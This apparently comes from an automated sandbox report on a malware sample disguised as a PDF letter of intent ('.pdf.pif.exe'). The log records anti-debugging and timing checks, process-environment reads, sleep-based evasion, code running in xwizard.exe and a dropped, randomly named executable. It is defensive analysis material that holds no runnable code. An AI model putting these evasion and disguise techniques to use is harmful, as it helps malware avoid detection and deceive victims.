            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe; API coverage: 0.2 %
            Source: C:\Windows\SysWOW64\xwizard.exe; API coverage: 2.7 %
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 1244; Thread sleep count: 1172 > 30
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 1244; Thread sleep time: -2344000s >= -30000s
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 1244; Thread sleep count: 8800 > 30
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 1244; Thread sleep time: -17600000s >= -30000s
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe TID: 6900; Thread sleep time: -35000s >= -30000s
            Source: C:\Windows\SysWOW64\xwizard.exe; Last function: Thread delayed
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe; Code function: 0_2_004055D5 GetTempPathW, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe; Code function: 0_2_00406089 FindFirstFileW, FindClose
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe; Code function: 0_2_00402706 FindFirstFileW
            Source: C:\Windows\SysWOW64\xwizard.exe; Code function: 6_2_028BC840 FindFirstFileW, FindNextFileW, FindClose
            Source: firefox.exe, 00000009.00000002.2641912515.000002A39C5DC000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2352648578.0000000002CCF000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2253237778.0000000002CCF000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2253398404.0000000002CCF000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2352587861.0000000002C78000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
            Source: ybjXXpYwhPHZD.exe, 00000007.00000002.3107806339.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
            Source: xwizard.exe, 00000006.00000002.3107060521.0000000002A86000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe; API call chain: ExitProcess graph end node graph_0-4366
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe; API call chain: ExitProcess graph end node graph_0-4360
            Source: C:\Windows\SysWOW64\xwizard.exe; Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\xwizard.exe; Process queried: DebugPort
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe; Code function: 2_2_3300D1C0 rdtsc
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe; Code function: 2_2_32FD35C0 NtCreateMutant, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe; Code function: 0_2_004060B0 GetModuleHandleA, LoadLibraryA, GetProcAddress
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB51EF mov eax, dword ptr fs:[00000030h]2_2_32FB51EF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F951ED mov eax, dword ptr fs:[00000030h]2_2_32F951ED
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FCD1D0 mov eax, dword ptr fs:[00000030h]2_2_32FCD1D0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FCD1D0 mov ecx, dword ptr fs:[00000030h]2_2_32FCD1D0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305903E mov eax, dword ptr fs:[00000030h]2_2_3305903E
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305903E mov eax, dword ptr fs:[00000030h]2_2_3305903E
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305903E mov eax, dword ptr fs:[00000030h]2_2_3305903E
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305903E mov eax, dword ptr fs:[00000030h]2_2_3305903E
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FAB1B0 mov eax, dword ptr fs:[00000030h]2_2_32FAB1B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303705E mov ebx, dword ptr fs:[00000030h]2_2_3303705E
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303705E mov eax, dword ptr fs:[00000030h]2_2_3303705E
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33065060 mov eax, dword ptr fs:[00000030h]2_2_33065060
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FE7190 mov eax, dword ptr fs:[00000030h]2_2_32FE7190
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301106E mov eax, dword ptr fs:[00000030h]2_2_3301106E
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3300D070 mov ecx, dword ptr fs:[00000030h]2_2_3300D070
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301D080 mov eax, dword ptr fs:[00000030h]2_2_3301D080
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301D080 mov eax, dword ptr fs:[00000030h]2_2_3301D080
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F172 mov eax, dword ptr fs:[00000030h]2_2_32F8F172
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F97152 mov eax, dword ptr fs:[00000030h]2_2_32F97152
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F89148 mov eax, dword ptr fs:[00000030h]2_2_32F89148
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F89148 mov eax, dword ptr fs:[00000030h]2_2_32F89148
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F89148 mov eax, dword ptr fs:[00000030h]2_2_32F89148
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F89148 mov eax, dword ptr fs:[00000030h]2_2_32F89148
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3300D0C0 mov eax, dword ptr fs:[00000030h]2_2_3300D0C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3300D0C0 mov eax, dword ptr fs:[00000030h]2_2_3300D0C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F91131 mov eax, dword ptr fs:[00000030h]2_2_32F91131
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F91131 mov eax, dword ptr fs:[00000030h]2_2_32F91131
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8B136 mov eax, dword ptr fs:[00000030h]2_2_32F8B136
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8B136 mov eax, dword ptr fs:[00000030h]2_2_32F8B136
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8B136 mov eax, dword ptr fs:[00000030h]2_2_32F8B136
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8B136 mov eax, dword ptr fs:[00000030h]2_2_32F8B136
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330650D9 mov eax, dword ptr fs:[00000030h]2_2_330650D9
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBD6E0 mov eax, dword ptr fs:[00000030h]2_2_32FBD6E0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBD6E0 mov eax, dword ptr fs:[00000030h]2_2_32FBD6E0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304F72E mov eax, dword ptr fs:[00000030h]2_2_3304F72E
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3305972B mov eax, dword ptr fs:[00000030h]2_2_3305972B
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC16CF mov eax, dword ptr fs:[00000030h]2_2_32FC16CF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9B6C0 mov eax, dword ptr fs:[00000030h]2_2_32F9B6C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9B6C0 mov eax, dword ptr fs:[00000030h]2_2_32F9B6C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9B6C0 mov eax, dword ptr fs:[00000030h]2_2_32F9B6C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9B6C0 mov eax, dword ptr fs:[00000030h]2_2_32F9B6C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9B6C0 mov eax, dword ptr fs:[00000030h]2_2_32F9B6C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9B6C0 mov eax, dword ptr fs:[00000030h]2_2_32F9B6C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3306B73C mov eax, dword ptr fs:[00000030h]2_2_3306B73C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3306B73C mov eax, dword ptr fs:[00000030h]2_2_3306B73C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3306B73C mov eax, dword ptr fs:[00000030h]2_2_3306B73C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3306B73C mov eax, dword ptr fs:[00000030h]2_2_3306B73C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F876B2 mov eax, dword ptr fs:[00000030h]2_2_32F876B2
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F876B2 mov eax, dword ptr fs:[00000030h]2_2_32F876B2
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F876B2 mov eax, dword ptr fs:[00000030h]2_2_32F876B2
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33063749 mov eax, dword ptr fs:[00000030h]2_2_33063749
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8D6AA mov eax, dword ptr fs:[00000030h]2_2_32F8D6AA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8D6AA mov eax, dword ptr fs:[00000030h]2_2_32F8D6AA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303375F mov eax, dword ptr fs:[00000030h]2_2_3303375F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303375F mov eax, dword ptr fs:[00000030h]2_2_3303375F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303375F mov eax, dword ptr fs:[00000030h]2_2_3303375F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303375F mov eax, dword ptr fs:[00000030h]2_2_3303375F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303375F mov eax, dword ptr fs:[00000030h]2_2_3303375F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304F78A mov eax, dword ptr fs:[00000030h]2_2_3304F78A
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC9660 mov eax, dword ptr fs:[00000030h]2_2_32FC9660
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC9660 mov eax, dword ptr fs:[00000030h]2_2_32FC9660
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330197A9 mov eax, dword ptr fs:[00000030h]2_2_330197A9
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301F7AF mov eax, dword ptr fs:[00000030h]2_2_3301F7AF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301F7AF mov eax, dword ptr fs:[00000030h]2_2_3301F7AF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301F7AF mov eax, dword ptr fs:[00000030h]2_2_3301F7AF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301F7AF mov eax, dword ptr fs:[00000030h]2_2_3301F7AF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301F7AF mov eax, dword ptr fs:[00000030h]2_2_3301F7AF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330637B6 mov eax, dword ptr fs:[00000030h]2_2_330637B6
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304D7B0 mov eax, dword ptr fs:[00000030h]2_2_3304D7B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304D7B0 mov eax, dword ptr fs:[00000030h]2_2_3304D7B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F626 mov eax, dword ptr fs:[00000030h]2_2_32F8F626
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F626 mov eax, dword ptr fs:[00000030h]2_2_32F8F626
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F626 mov eax, dword ptr fs:[00000030h]2_2_32F8F626
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F626 mov eax, dword ptr fs:[00000030h]2_2_32F8F626
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F626 mov eax, dword ptr fs:[00000030h]2_2_32F8F626
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F626 mov eax, dword ptr fs:[00000030h]2_2_32F8F626
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F626 mov eax, dword ptr fs:[00000030h]2_2_32F8F626
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F626 mov eax, dword ptr fs:[00000030h]2_2_32F8F626
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F626 mov eax, dword ptr fs:[00000030h]2_2_32F8F626
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F93616 mov eax, dword ptr fs:[00000030h]2_2_32F93616
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F93616 mov eax, dword ptr fs:[00000030h]2_2_32F93616
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC1607 mov eax, dword ptr fs:[00000030h]2_2_32FC1607
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FCF603 mov eax, dword ptr fs:[00000030h]2_2_32FCF603
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9D7E0 mov ecx, dword ptr fs:[00000030h]2_2_32F9D7E0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33065636 mov eax, dword ptr fs:[00000030h]2_2_33065636
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F957C0 mov eax, dword ptr fs:[00000030h]2_2_32F957C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F957C0 mov eax, dword ptr fs:[00000030h]2_2_32F957C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F957C0 mov eax, dword ptr fs:[00000030h]2_2_32F957C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F7BA mov eax, dword ptr fs:[00000030h]2_2_32F8F7BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F7BA mov eax, dword ptr fs:[00000030h]2_2_32F8F7BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F7BA mov eax, dword ptr fs:[00000030h]2_2_32F8F7BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F7BA mov eax, dword ptr fs:[00000030h]2_2_32F8F7BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F7BA mov eax, dword ptr fs:[00000030h]2_2_32F8F7BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F7BA mov eax, dword ptr fs:[00000030h]2_2_32F8F7BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F7BA mov eax, dword ptr fs:[00000030h]2_2_32F8F7BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F7BA mov eax, dword ptr fs:[00000030h]2_2_32F8F7BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8F7BA mov eax, dword ptr fs:[00000030h]2_2_32F8F7BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBD7B0 mov eax, dword ptr fs:[00000030h]2_2_32FBD7B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3302D660 mov eax, dword ptr fs:[00000030h]2_2_3302D660
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301368C mov eax, dword ptr fs:[00000030h]2_2_3301368C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301368C mov eax, dword ptr fs:[00000030h]2_2_3301368C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301368C mov eax, dword ptr fs:[00000030h]2_2_3301368C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301368C mov eax, dword ptr fs:[00000030h]2_2_3301368C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8B765 mov eax, dword ptr fs:[00000030h]2_2_32F8B765
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8B765 mov eax, dword ptr fs:[00000030h]2_2_32F8B765
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8B765 mov eax, dword ptr fs:[00000030h]2_2_32F8B765
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8B765 mov eax, dword ptr fs:[00000030h]2_2_32F8B765
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA3740 mov eax, dword ptr fs:[00000030h]2_2_32FA3740
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA3740 mov eax, dword ptr fs:[00000030h]2_2_32FA3740
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA3740 mov eax, dword ptr fs:[00000030h]2_2_32FA3740
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9973A mov eax, dword ptr fs:[00000030h]2_2_32F9973A
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9973A mov eax, dword ptr fs:[00000030h]2_2_32F9973A
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304F6C7 mov eax, dword ptr fs:[00000030h]2_2_3304F6C7
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F89730 mov eax, dword ptr fs:[00000030h]2_2_32F89730
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F89730 mov eax, dword ptr fs:[00000030h]2_2_32F89730
